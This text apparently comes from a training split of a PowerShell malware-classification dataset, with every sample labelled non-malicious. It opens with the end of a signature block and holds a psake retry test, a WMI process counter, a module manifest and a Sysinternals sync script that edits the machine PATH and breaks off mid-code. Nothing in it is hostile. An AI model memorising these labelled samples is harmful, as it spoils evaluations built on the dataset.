N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE '' SIG '' 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB '' SIG '' 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k '' SIG '' 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe '' SIG '' CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB '' SIG '' /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h '' SIG '' 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov '' SIG '' L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj '' SIG '' dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy '' SIG '' bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0 '' SIG '' dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv '' SIG '' TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB '' SIG '' nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI '' SIG '' KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv '' SIG '' bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr '' SIG '' BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp '' SIG '' AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq '' SIG '' hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW '' SIG '' EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H '' SIG '' qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS '' SIG '' 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m '' SIG '' kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj '' SIG '' HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO '' SIG '' r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat '' SIG '' ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n '' SIG '' t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA '' SIG '' KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj '' SIG '' Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv '' SIG '' 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3 '' SIG '' HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs '' SIG '' 6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991 '' SIG '' bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib '' SIG '' V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x '' SIG '' ghojMIIaHwIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG '' SIG '' A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u '' SIG '' ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u '' SIG '' MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n '' SIG '' IFBDQSAyMDExAhMzAAAEA73VlV0POxitAAAAAAQDMA0G '' SIG '' CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor '' SIG '' BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE '' SIG '' AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCD18Oa3LC1fqUFN '' SIG '' MI90LtLKd0TUh6c2npkhdpCHjHQLbTBCBgorBgEEAYI3 '' SIG '' AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY '' SIG '' aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3 '' SIG '' DQEBAQUABIIBAHiyqzBY8u8MQH059PMpL80xjzzOHO/i '' SIG '' hKLdX8UAKtl14uRw9GtQV/aW+U4CIeQcCzT96/BazyYQ '' SIG '' DGhNjZ2ZlKcPPqLK8gDyzaY89XLp598TcWy7Cpn42HUH '' SIG '' a37U8m09q7mBFnduosbxYg3md1TkPygMUqv+onntAYTd '' SIG '' /RjRw7fMxqrzXYuy4W406ZCp+7xDimosM2cj/0GPqix5 '' SIG '' d7YSTjj/jNGnxkKUnrEtZDzvO2J1OZhhhzWWjKALC8Kl '' SIG '' f8l1HpfY+cRaOKlz6sAv2w8jz4FG+AFfDyRwAjyXyof8 '' SIG '' YoAJgH4LZOiNI8p+60lw7YSibyQ1z1zP3sqf0AAf8Dxl '' SIG '' /1mhghetMIIXqQYKKwYBBAGCNwMDATGCF5kwgheVBgkq '' SIG '' hkiG9w0BBwKggheGMIIXggIBAzEPMA0GCWCGSAFlAwQC '' SIG '' AQUAMIIBWgYLKoZIhvcNAQkQAQSgggFJBIIBRTCCAUEC '' SIG '' AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg '' SIG '' GnHIl0LIhfCrhIUbss3CbglNsi9WlS0lSWcZCNep7IwC '' SIG '' Bmb/GX4R/RgTMjAyNDEwMjgxMTQwNDMuODE1WjAEgAIB '' SIG '' 9KCB2aSB1jCB0zELMAkGA1UEBhMCVVMxEzARBgNVBAgT '' SIG '' Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc '' SIG '' BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsG '' SIG '' A1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9u '' SIG '' cyBMaW1pdGVkMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBF '' SIG '' U046NkIwNS0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jv '' SIG '' c29mdCBUaW1lLVN0YW1wIFNlcnZpY2WgghH7MIIHKDCC '' SIG '' BRCgAwIBAgITMwAAAfaDLyZqVF0iwQABAAAB9jANBgkq '' SIG '' hkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UE '' SIG '' CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe '' SIG '' MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYw '' SIG '' JAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0Eg '' SIG '' MjAxMDAeFw0yNDA3MjUxODMxMDRaFw0yNTEwMjIxODMx '' SIG '' MDRaMIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz '' SIG '' aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE '' SIG '' ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL '' SIG '' EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExp '' SIG '' bWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVTTjo2 '' SIG '' QjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0 '' SIG '' IFRpbWUtU3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcN '' SIG '' AQEBBQADggIPADCCAgoCggIBANFCXizEfzfVjwWYbilR '' SIG '' RfnliWevFro3Y+F+iUdOXMTuQnqTV6Ne61Ws8Fi5JuQI '' SIG '' 2lYdfWVYwwoR84psbKGl8TbvCA4ICsKV76QACLb+FMed '' SIG '' HvUtrlcHyr+e6fSShvkO1TjUobo5dTQjJHIEqz3Znf/M '' SIG '' 3LJoc3DaGy6JqwgCDkWfCMIWMuLIlUJX9TSoZcgM5pFi '' SIG '' Q9DfutCIqIBQc4N8iErL66DsdMdcUotj4kSEJU1xO+DI '' SIG '' IGQyAyqh/4W/RU9pCv51f2l47qPSzK60Zp+OKGGAA3v6 '' SIG '' zveRfkht7rroX/h+CK4l69IfabQOksByT0tlZmzVgo0F '' SIG '' quRuGJK3KmzzGse7zV1MLu0+uRPHxT3dSLhPUbBuEzAF '' SIG '' e15FwaKZjzX7y9IY8YOOJKUJ9/OFeOqPs3UKsuSvXQ5V '' SIG '' pvyer2baecgNT8g98Ph2xrm0tJ4hENS+sBjqz38yJtBX '' SIG '' Tp/sRaOPBEZfhccP9zr1zOQmNRKp8xM5z48yXOzicISV '' SIG '' Ud1UAx4wXBBUzr0vRNHYjbtXqHMPmQpM+D7v6EL/oKlP '' SIG '' m38S/HuzxZLX0Q5TOhcjs4z+M7iNuYA/LTvcyYOoOn0a '' SIG '' WmXON/ZgG5Jd8wlc0yw4HIb+ksUGoybb76EGmcUH9LUY '' SIG '' j3G69h1nzKKqnfbokNIU1BIRuOBQUk3lD2XhHp0QlmnQ '' SIG '' luBvAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUSMGbCbjn '' SIG '' CX0nD1nF2bgQOAfPSvIwHwYDVR0jBBgwFoAUn6cVXQBe '' SIG '' Yl2D9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZO '' SIG '' aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j '' SIG '' cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy '' SIG '' MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggr '' SIG '' BgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29t '' SIG '' L3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0 '' SIG '' YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/ '' SIG '' BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNV '' SIG '' HQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBANd5 '' SIG '' AYqx9XB7tVmEdcrI9duaJhrUND2kJBM8Bm+9MbakqCPr '' SIG '' L0IobIHU2MWj36diFRXYI2jGgYvNcAfP57vOuhXxSinY '' SIG '' Xad8JzGfdT6T+DqHuzXH+qiApIErsIHSHUL6hNIfFUOU '' SIG '' FubA1eENCZ4+H+yh2MeDYjPAuI08PEkLbLsVokx9h4pH '' SIG '' 90GAe9Wu3Qfc4BzpFtIYFBHljvZodsFqmEv0OPAEozqm '' SIG '' MP4WueKFTn39tlmqB/vx8XfTUxFP+L5b7ESDFk9I7JzS '' SIG '' O9Y1QK0+EPQbelUoVs8qq2hOkilKGaxMAaVbCNCzINl9 '' SIG '' 4Ti25Qtb8TN/sDMjofe2hTrO7BZ7nprSNjH4/KoNegWU '' SIG '' ycV5aT7q1qxvjgY+AaEw5AvQMV2Ad8hLbsDLO6UVi8sS '' SIG '' McP8FfUxylBpvsflRNDzi8JK0jII7pUl5KXxCx1loglb '' SIG '' JSWxSCAf+AJb/o0CUigCbqPQhK25tqng5P84yWJWGlRj '' SIG '' MirmGfrkkVSgdqpBD3BMxtXTvcyGtTKd9ifs81tz+7Li '' SIG '' X48OtrN4Qzi5PupTEDkdOMftqNexty3Hi5JMSZuNRK3Y '' SIG '' k4wJnQpXp/cpeh4DKRkuKJIxQiV/gqThV+4AQNz1cUFr '' SIG '' m4rAEGy+R4ExQbUDRM3AnYdRmMP+p88zTbftBkJ56GwX '' SIG '' XXzgIqpM7yLal47xsitUMIIHcTCCBVmgAwIBAgITMwAA '' SIG '' ABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCB '' SIG '' iDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 '' SIG '' b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1p '' SIG '' Y3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWlj '' SIG '' cm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 '' SIG '' IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgz '' SIG '' MjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz '' SIG '' aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE '' SIG '' ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD '' SIG '' Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC '' SIG '' AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOTh '' SIG '' pkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2 '' SIG '' AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYj '' SIG '' DLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFE '' SIG '' yHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2 '' SIG '' vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6O '' SIG '' U8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUo '' SIG '' veO0hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3rMvr '' SIG '' g0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdb '' SIG '' Z2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZ '' SIG '' nkXftnIv231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZN '' SIG '' N3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEz '' SIG '' OUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMY '' SIG '' ctenIPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5 '' SIG '' C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 '' SIG '' bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a '' SIG '' j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkr '' SIG '' BgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQq '' SIG '' p1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cV '' SIG '' XQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwr '' SIG '' BgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDov '' SIG '' L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1Jl '' SIG '' cG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMI '' SIG '' MBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1Ud '' SIG '' DwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQY '' SIG '' MBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRP '' SIG '' ME0wS6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNv '' SIG '' bS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8y '' SIG '' MDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYI '' SIG '' KwYBBQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNv '' SIG '' bS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt '' SIG '' MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h '' SIG '' LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnX '' SIG '' wnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03d '' SIG '' mLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27Y '' SIG '' P0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfak '' SIG '' Vqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8 '' SIG '' F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4s '' SIG '' a3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6 '' SIG '' MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4KWN1A '' SIG '' PMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lU '' SIG '' ZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtq '' SIG '' RRFHqfG3rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4K '' SIG '' u+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLB '' SIG '' gqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr '' SIG '' 4A245oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvp '' SIG '' e784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ '' SIG '' tB1VM1izoXBm8qGCA1YwggI+AgEBMIIBAaGB2aSB1jCB '' SIG '' 0zELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 '' SIG '' b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1p '' SIG '' Y3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWlj '' SIG '' cm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVk '' SIG '' MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046NkIwNS0w '' SIG '' NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l '' SIG '' LVN0YW1wIFNlcnZpY2WiIwoBATAHBgUrDgMCGgMVABVP '' SIG '' XkqXcbNGtOiRSLhhRyI/yPt+oIGDMIGApH4wfDELMAkG '' SIG '' A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO '' SIG '' BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m '' SIG '' dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0 '' SIG '' IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEL '' SIG '' BQACBQDqyeLvMCIYDzIwMjQxMDI4MTAxNjE1WhgPMjAy '' SIG '' NDEwMjkxMDE2MTVaMHQwOgYKKwYBBAGEWQoEATEsMCow '' SIG '' CgIFAOrJ4u8CAQAwBwIBAAICFfowBwIBAAICEqAwCgIF '' SIG '' AOrLNG8CAQAwNgYKKwYBBAGEWQoEAjEoMCYwDAYKKwYB '' SIG '' BAGEWQoDAqAKMAgCAQACAwehIKEKMAgCAQACAwGGoDAN '' SIG '' BgkqhkiG9w0BAQsFAAOCAQEAaVBVOPr2SRclJlW/lmVi '' SIG '' GJvOcFpGqlEDCFw2vPQCUXRCDWQWGLiiWR8Bl3ryMnGq '' SIG '' iOTHBoNvFJ15U/OflSx3EW9gakwapVA38ljAw0ouPzct '' SIG '' aPooRaIYbP7o0LsZIdpbH7t3/ETvqx8r8qHOmlWKF6W7 '' SIG '' GLD7L1oZT+VSGN8lzu87QfU3b6F137EjCBoCDlETYwuf '' SIG '' ph/q+EdIJIKzv/WZAUlmsfw6AEBhDgEMvbOln4T1vT08 '' SIG '' SAZI22JxMcPOI9T1v+2j1YWr86B309Hz+3ofXgjWPWsf '' SIG '' gF6Gv6Tjq7hc6YzC9/96PVUYJasuo73AcTtIelH/RZKp '' SIG '' x8IOwbDHCFoqrzGCBA0wggQJAgEBMIGTMHwxCzAJBgNV '' SIG '' BAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD '' SIG '' VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg '' SIG '' Q29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBU '' SIG '' aW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB9oMvJmpUXSLB '' SIG '' AAEAAAH2MA0GCWCGSAFlAwQCAQUAoIIBSjAaBgkqhkiG '' SIG '' 9w0BCQMxDQYLKoZIhvcNAQkQAQQwLwYJKoZIhvcNAQkE '' SIG '' MSIEIFMcY5ZBacsT7rlMDxIf8CnJtGa3iY6k6sLSuQWf '' SIG '' GUP5MIH6BgsqhkiG9w0BCRACLzGB6jCB5zCB5DCBvQQg '' SIG '' K2FM8ZRepuVEi0uH/DVy//GqDRFXbAmUZhfi5UIxtqIw '' SIG '' gZgwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMK '' SIG '' V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG '' SIG '' A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD '' SIG '' VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx '' SIG '' MAITMwAAAfaDLyZqVF0iwQABAAAB9jAiBCBa2gYJOMV2 '' SIG '' ozACOvK1EAsklDihg0XhAEFDgLr4SMMAJTANBgkqhkiG '' SIG '' 9w0BAQsFAASCAgBMiuYFE/m6ocqGuL/y4/6FL253op7t '' SIG '' vIxsvzPD+PHJasqb4pCfZ1qWvrl5ku2twC4t/9+LIZM0 '' SIG '' SSYonS2KeRbDJD51HVd6eCu8y8nuU1ExDdhdVCxN3odn '' SIG '' 3uSkMjIeSW8KqBD1M4vjMGinRcsSMYhuHTXGBKYu3E1A '' SIG '' SfqEmfkidNtWtPhD1UijHXZ1sS7o1rNvqiDLyaudjsK7 '' SIG '' CrZ3HnOWDFrFmUfg8oy7SOwOaZP7LJk+plIf9wn8V7pQ '' SIG '' C/wDYdFtSacdGlTzxIdvT3st9WmnL/Ek1g86EobSKf/c '' SIG '' TD48o6WJDqaNzYDdDFdIMsUeThvKWMyn3TuExFjoW5Y2 '' SIG '' K5IeFJj1VXPs7QkuB7mJFjJDgvzsHqMW9qdN8Bw4otVW '' SIG '' NO2VQNAiYkAIYY9sYa5tjdhPeKxCaX0k8L0lRSpaGS25 '' SIG '' GdawNAyCcQzgxX8F3QYV0ugKfY/pU52wZ2NSDgJ8Pe04 '' SIG '' gs4KBBkMDHrdpFumMS7ivalJ421au4SJw3SBZE2qI25W '' SIG '' 4/Hkzzhn5mTPfyv/294V2VRLutn62NN3eBTjirTzFSzp '' SIG '' vLt6iS5MLNMpxBuLGU+4sqDLya9XFa7RJiyhSC16GDt9 '' SIG '' Puek9xjBHVh6l8HbsZH69a7T/NpVh1btYvolvK1AHlUP '' SIG '' yM4eo7ziu3SJaHVcgrjydMICslI6m2z3lffmTw== '' SIG '' End signature block
combined_dataset/train/non-malicious/2884.ps1
2884.ps1
Task default -depends Test Task Test { [string]$currentPath = Get-Location [string]$parentPath = Split-Path $currentPath -Parent [string[]]$global:locations = @() [string[]]$expected = "$currentPath,$parentPath,$parentPath,$parentPath,$currentPath" [scriptblock]$cmd = { $global:locations += Get-Location throw "forced error" } $global:locations += Get-Location try { Exec -cmd $cmd -maxRetries 2 -workingDirectory $parentPath } catch {} $global:locations += Get-Location [string]$actual = $global:locations -join "," $actual = $actual.ToLower() Assert ($actual -eq $expected) "Expected: '$expected' Actual: '$actual'" }
combined_dataset/train/non-malicious/Get-ProcessCount.ps1
Get-ProcessCount.ps1
# Get-ProcessCount uses 2 main variables, server and process name. # Process name is typically the end exe, such as "svchost.exe" # Will accept unnamed args (Get-ProcessCount servername processname) # or named args (Get-ProcessCount -Computer servername -Process processname) Function Get-ProcessCount([string]$process, [string]$computer = "localhost", [switch]$guess) { $i = 0 $procList = Get-WmiObject -Class Win32_Process -Computer $computer foreach($proc in $procList) { If($proc.name -eq $process) { $i++ } } Function Try-Guessing([string]$process) { foreach($proc in $procList) { If($proc.Name -match $process) { $possible += @($($proc.name)) } } If($possible.Count -ge 1) { $uniq = $possible | Get-Unique foreach($proc in $uniq) { Write-Host "Did you mean $($proc)?" -ForeGroundColor Magenta } } else { Write-Host "I tried guessing, but I couldn't find $($process) that way, either. Sorry." -ForeGroundColor Green } } If($i -ge 1) { Write-Host "There are $i instances of $process on $computer" -ForegroundColor Green } else { Write-Host "0 instances of $process found on $computer" -ForegroundColor Green Try-Guessing $process } }
combined_dataset/train/non-malicious/sample_62_52.ps1
sample_62_52.ps1
# # Module manifest for module 'PowerShellProTools' # # Generated by: Ironman Software, LLC # # Generated on: 7/11/2024 # @{ # Script module or binary module file associated with this manifest. RootModule = 'PowerShellProTools.psm1' # Version number of this module. ModuleVersion = '2024.7.0' # Supported PSEditions # CompatiblePSEditions = @() # ID used to uniquely identify this module GUID = '7f781f38-edf7-478e-bf15-12913cc81da9' # Author of this module Author = 'Ironman Software, LLC' # Company or vendor of this module CompanyName = 'Unknown' # Copyright statement for this module Copyright = 'Ironman Software, LLC' # Description of the functionality provided by this module Description = 'PowerShell script packaging and Windows Forms design.' # Minimum version of the PowerShell engine required by this module # PowerShellVersion = '' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module # RequiredModules = @() # Assemblies that must be loaded prior to importing this module # RequiredAssemblies = @() # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess NestedModules = @('PowerShellToolsPro.Cmdlets.dll') # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Merge-Script', 'Show-WinFormDesigner', 'ConvertTo-WinForm', 'Show-PSScriptPad' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. # Tags = @() # A URL to the license for this module. # LicenseUri = '' # A URL to the main website for this project. # ProjectUri = '' # A URL to an icon representing this module. # IconUri = '' # ReleaseNotes of this module ReleaseNotes = 'https://docs.poshtools.com/powershell-pro-tools-module' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/Get-Sysinternals_2.ps1
Get-Sysinternals_2.ps1
function Get-SysInternals { param ( $sysIntDir=(join-path $env:systemroot "\\Sysinternals\\") ) if(!(Test-Path -Path $sysIntDir -PathType Container)) { $null = New-Item -Type Directory -Path $sysIntDir -Force } $log = join-path $sysIntDir "changes.log" Add-Content -force $log -value "`n`n[$(get-date)]SysInternals sync has been started" net use \\\\live.sysinternals.com\\tools /persistent:no New-PSDrive -Name SYS -PSProvider filesystem -Root \\\\live.sysinternals.com\\tools dir Sys: -recurse | foreach { $fileName = $_.name $localFile = join-path $sysIntDir $_.name $exist = test-path $localFile $msgNew = "new utility found: $fileName , downloading..." $msgUpdate = "file : $fileName is newer, updating..." $msgNoChange = "nothing changed for: $fileName" if($exist){ if($_.lastWriteTime -gt (Get-Item $localFile).lastWriteTime) { Copy-Item $_.fullname $sysIntDir -force Write-Host $msgUpdate -fore yellow Add-Content -force $log -value $msgUpdate } else { Add-Content $log -force -value $msgNoChange Write-Host $msgNoChange } } else { if($_.extension -eq ".exe") { Write-Host $msgNew -fore green Add-Content -force $log -value $msgNew } Copy-Item $_.fullname $sysIntDir -force } } Update-Path "Sysinternals" $sysIntDir "" net use \\\\live.sysinternals.com\\tools\\ /delete } function Update-Path ( [string] $Product, [string] $productPath, [string] $Property) { # Get our existing path as an array $pathArray = @() foreach ($pathItem in [Environment]::GetEnvironmentVariable('Path', 'Machine').Split(';')) { # Remove trailing \\ if any $pathItem = $pathItem.TrimEnd(('\\')); $pathItem = $pathItem.Replace('"',""); #$pathItem =('"{0}"' -f $pathItem) if ($pathArray -contains $pathItem) { "Removing duplicate item: " + $pathItem; } else { "Keeping item: " + $pathItem; $pathArray += $pathItem } } # Append new paths. "test path "+$productPath #TODO: encapsulate to a function if (Test-Path $productPath) { if ([string]::IsNullOrEmpty($Property)) { [string] $path = $productPath } else { [string] $path = (Get-ItemProperty $produuctPath).($Property) } #$path if (-not [string]::IsNullOrEmpty($path)) { $Product + " found" $path = 